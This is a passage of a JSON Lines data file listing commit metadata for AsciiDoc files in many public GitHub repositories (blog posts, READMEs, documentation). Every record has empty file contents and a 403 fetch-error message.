2016-11-11-092000-Friday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-11-092000-Friday-Morning.adoc","new_file":"_posts\/2016-11-11-092000-Friday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c1364229148ebea58bfcbdf7617343e9c8ba89f","subject":"Update 2018-02-05-Think-About-Documents.adoc","message":"Update 2018-02-05-Think-About-Documents.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_file":"_posts\/2018-02-05-Think-About-Documents.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f141594fc0cc84e99349ee97c4266594b730d7f","subject":"adding README-es.adoc","message":"adding 
README-es.adoc\n","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"README-es.adoc","new_file":"README-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"032f1d58914ef5a85d4849cd3ff5e04b1ea2405c","subject":"Delete README-ja.adoc","message":"Delete README-ja.adoc","repos":"gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io,gsha0\/hubpress.io","old_file":"README-ja.adoc","new_file":"README-ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gsha0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cf2c5e63c0a5290f81ee034fb1f21da549230a6","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a2ed3565b5e3554b07d7f5d95bc18eb64a31fd7","subject":"y2b create post World's First Projection Mouse - Does It Suck?","message":"y2b create post World's First Projection Mouse - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-24-Worlds-First-Projection-Mouse--Does-It-Suck.adoc","new_file":"_posts\/2016-12-24-Worlds-First-Projection-Mouse--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d6b51f801ad8196e4235bdf1201cbff27e52391","subject":"Create 2014-09-08-forge-2.9.2.final.asciidoc","message":"Create 2014-09-08-forge-2.9.2.final.asciidoc","repos":"addonis1990\/docs,addonis1990\/docs,forge\/docs,forge\/docs,luiz158\/docs,agoncal\/docs,agoncal\/docs,luiz158\/docs","old_file":"news\/2014-09-08-forge-2.9.2.final.asciidoc","new_file":"news\/2014-09-08-forge-2.9.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a9abde3216422bb5bebe096188cc84c77dd9609c","subject":"Update 2019-02-22-docker-selenium-with-php.adoc","message":"Update 
2019-02-22-docker-selenium-with-php.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fabb74ad0c27f5846628454b37188acc0d283f84","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a092a748fd2b342537c100bb31c6e88b56accc5","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Maven\/Maven central.adoc","new_file":"Maven\/Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88a8812166d7f078ca97a884ff21cffa0fd49633","subject":"Update 2017-02-07-Managing-docker-compose.adoc","message":"Update 2017-02-07-Managing-docker-compose.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Managing-docker-compose.adoc","new_file":"_posts\/2017-02-07-Managing-docker-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7cd0665c31d3b7afdfe94e87c600fb3116acc0f","subject":"Translate in progress (2016\/05\/24-25)","message":"Translate in progress (2016\/05\/24-25)\n","repos":"sardine\/spring-ref-ja","old_file":"src\/asciidoc\/web-mvc.adoc","new_file":"src\/asciidoc\/web-mvc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sardine\/spring-ref-ja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6c2443434979af3e44bafcb72767303cd3c5b25","subject":"Publish 2015-6-1-MythTV-Notes.adoc","message":"Publish 2015-6-1-MythTV-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"2015-6-1-MythTV-Notes.adoc","new_file":"2015-6-1-MythTV-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"5fda76f0507bd426ab9300feb412cd137c44dc33","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/Windows Search.asciidoc","new_file":"documentation\/Windows Search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"97ed15a7c5709481352911f5b5182c6431982c16","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75558169f14eee7e0cb8d2b3f6847472e510aa93","subject":"Flare adoc first draft","message":"Flare adoc first draft\n","repos":"ethaneldridge\/vassal,ethaneldridge\/vassal,ethaneldridge\/vassal","old_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Flare.adoc","new_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Flare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ethaneldridge\/vassal.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"a4ff15a12440e9fbdbb0e4bee92422eefb7f6068","subject":"y2b create post WD My Book Studio LX Unboxing \\u0026 Overview","message":"y2b create post WD My Book Studio LX Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-16-WD-My-Book-Studio-LX-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-16-WD-My-Book-Studio-LX-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb1288d67bba60967109bed445893c8ed588e372","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f0cfc92e87a5e5cc8bcf282e322dd093f199edf","subject":"Update 2019-01-15-Netlify-Nuxtjs-P-W-A.adoc","message":"Update 
2019-01-15-Netlify-Nuxtjs-P-W-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-15-Netlify-Nuxtjs-P-W-A.adoc","new_file":"_posts\/2019-01-15-Netlify-Nuxtjs-P-W-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73929c44498bdb4908c98bab7d743e530ac65fbd","subject":"adding input values","message":"adding input values\n","repos":"markllama\/atomic-idm","old_file":"discover\/README.adoc","new_file":"discover\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/atomic-idm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45f2cf7e13d5df6c5c4984b5bd11867e804d1a51","subject":"y2b create post JBL Micro Wireless \\u0026 JBL Micro 2 Unboxing","message":"y2b create post JBL Micro Wireless \\u0026 JBL Micro 2 Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-16-JBL-Micro-Wireless-u0026-JBL-Micro-2-Unboxing.adoc","new_file":"_posts\/2012-12-16-JBL-Micro-Wireless-u0026-JBL-Micro-2-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef8482a1db35af1b68357f0e93b18fc16fe23de7","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7222ae22eed95c21e2ff24e2c3c913faa1d4b2e1","subject":"OCTree","message":"OCTree\n","repos":"seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS","old_file":"OCTREE KD-TREE\/README.adoc","new_file":"OCTREE KD-TREE\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seyfullahuysal\/PCL-ROS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ae507ebd8c1ee0fd2eb278fdcc3e00d9e9b75e5","subject":"Add some documentation of release process","message":"Add some documentation of release process\n","repos":"Yubico\/yubico-java-client,Yubico\/yubico-java-client","old_file":"doc\/development.adoc","new_file":"doc\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-java-client.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1eaaee6c923b8664d629494da66d6bbfb1bb0211","subject":"Update dbm-create-changelog.adoc","message":"Update 
dbm-create-changelog.adoc","repos":"sbglasius\/grails-database-migration,jako512\/grails-database-migration","old_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-create-changelog.adoc","new_file":"src\/docs\/asciidoc\/ref\/Maintenance Scripts\/dbm-create-changelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jako512\/grails-database-migration.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"a1dbe912e0125626e7f30f8571dbb5053ba6b6d1","subject":"\ud83c\udf89 Debezium 1.1 release announcement","message":"\ud83c\udf89 Debezium 1.1 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-03-24-debezium-1-1-final-released.adoc","new_file":"blog\/2020-03-24-debezium-1-1-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"f4cc42a7d87f750eefef08c15a465a833e89b13c","subject":"Alerts blog entry for standalone scenario","message":"Alerts blog entry for standalone scenario\n","repos":"jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/08\/19\/hawkular-alerts-standalone.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/08\/19\/hawkular-alerts-standalone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"85290a06913ab044132891b8b4b1e66b6c36ffb9","subject":"Avoid conflict same simple name","message":"Avoid conflict same simple name\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Search path\/Exercices.adoc","new_file":"Search path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"99a06036beba6f4b524740c8c8e8b06af67486be","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"2ade1cd2c52e896c85bc335eff438e9c2382217f","subject":"Update 2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","message":"Update 2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","new_file":"_posts\/2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"0309733a4fa018caea5f6d0257606469ac8c81ab","subject":"Update 2015-10-01-Neu.adoc","message":"Update 2015-10-01-Neu.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-10-01-Neu.adoc","new_file":"_posts\/2015-10-01-Neu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"59edff5e455e1cd9bd9d120b1226549d30e16b77","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f3edc48a41f9cb0666d3a8f19cf8a4eea0804b2d","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"25e1248cce52bc7b7b04f1a45cecab3825a5dbbd","subject":"Update 2015-06-25-GIT.adoc","message":"Update 2015-06-25-GIT.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-06-25-GIT.adoc","new_file":"_posts\/2015-06-25-GIT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c067a2f5a20c958f9e57ebb0a7250c43324af4ca","subject":"Create deleteme.adoc","message":"Create deleteme.adoc","repos":"manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io","old_file":"_posts\/fotos\/deleteme.adoc","new_file":"_posts\/fotos\/deleteme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manueljordan\/manueljordan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a3236114da9bc19a39e03a03b78a273de1caea93","subject":"Ex interf","message":"Ex interf\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"3f468d575169f552dbc24e46d604fe4c9c8a6d37","subject":"Asciidoc lists","message":"Asciidoc lists\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Exercice bis.adoc","new_file":"Dev tools\/Exercice bis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"abdec93e2e90c16ec380ff73a81db6ded533ed77","subject":"Move install Google Cloud SDK to common snipppets","message":"Move install Google Cloud SDK to common snipppets\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-installgooglecloudsdk.adoc","new_file":"src\/main\/docs\/common-installgooglecloudsdk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"11d316a5752e5662af1c3231c8348dbcad28f1f4","subject":"y2b create post Tritton AX Pro Headset Unboxing \\u0026 Overview","message":"y2b create post Tritton AX Pro Headset Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-17-Tritton-AX-Pro-Headset-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-17-Tritton-AX-Pro-Headset-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f2fc01efdf4af01b34afc17935dbff7c54d00480","subject":"[DOC] Correct package import mistake","message":"[DOC] Correct package import mistake\n\nfix #678\n","repos":"takezoe\/elasticsearch-hadoop,costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"f03555785d8ca9ae746c12c6763409afcea5c7e5","subject":"Publish 2016-12-2-three-dimensional-pen-of-dream.adoc","message":"Publish 2016-12-2-three-dimensional-pen-of-dream.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-2-three-dimensional-pen-of-dream.adoc","new_file":"2016-12-2-three-dimensional-pen-of-dream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"af0f7063d18c090dc5435d9058e21a56a600d7e8","subject":"Write a proper manual page","message":"Write a proper manual page\n","repos":"lassik\/extract,lassik\/extract","old_file":"extract.1.adoc","new_file":"extract.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"}
{"commit":"4d6bb429e23293ac80999e2c2cd1876fd3a24a93","subject":"Update 2015-08-26-What-Matters-Revisited.adoc","message":"Update 2015-08-26-What-Matters-Revisited.adoc","repos":"extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io,extrapolate\/extrapolate.github.io","old_file":"_posts\/2015-08-26-What-Matters-Revisited.adoc","new_file":"_posts\/2015-08-26-What-Matters-Revisited.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/extrapolate\/extrapolate.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"19c4c85856c65b3873eaa92ddf12a9f41cc8d962","subject":"Update 2017-06-07-Podcast-Dues-Dues-Dues.adoc","message":"Update 2017-06-07-Podcast-Dues-Dues-Dues.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-07-Podcast-Dues-Dues-Dues.adoc","new_file":"_posts\/2017-06-07-Podcast-Dues-Dues-Dues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a5736202268af63b30216cb5fd352626a77eba7a","subject":"Update 2015-12-02-Test.adoc","message":"Update 2015-12-02-Test.adoc","repos":"adamperer\/diary,adamperer\/diary,adamperer\/diary","old_file":"_posts\/2015-12-02-Test.adoc","new_file":"_posts\/2015-12-02-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adamperer\/diary.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"760601cdbde7c69a520b6a262e3b0d5739b91178","subject":"Update 2016-12-02-test.adoc","message":"Update 2016-12-02-test.adoc","repos":"lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io","old_file":"_posts\/2016-12-02-test.adoc","new_file":"_posts\/2016-12-02-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lifengchuan2008\/lifengchuan2008.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d778c427633cee87ff7b2e4cb41995717428bfb9","subject":"y2b create post New Oversized Productivity Monitor by LG - CES 2013","message":"y2b create post New Oversized Productivity Monitor by LG - CES 2013","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-10-New-Oversized-Productivity-Monitor-by-LG--CES-2013.adoc","new_file":"_posts\/2013-01-10-New-Oversized-Productivity-Monitor-by-LG--CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
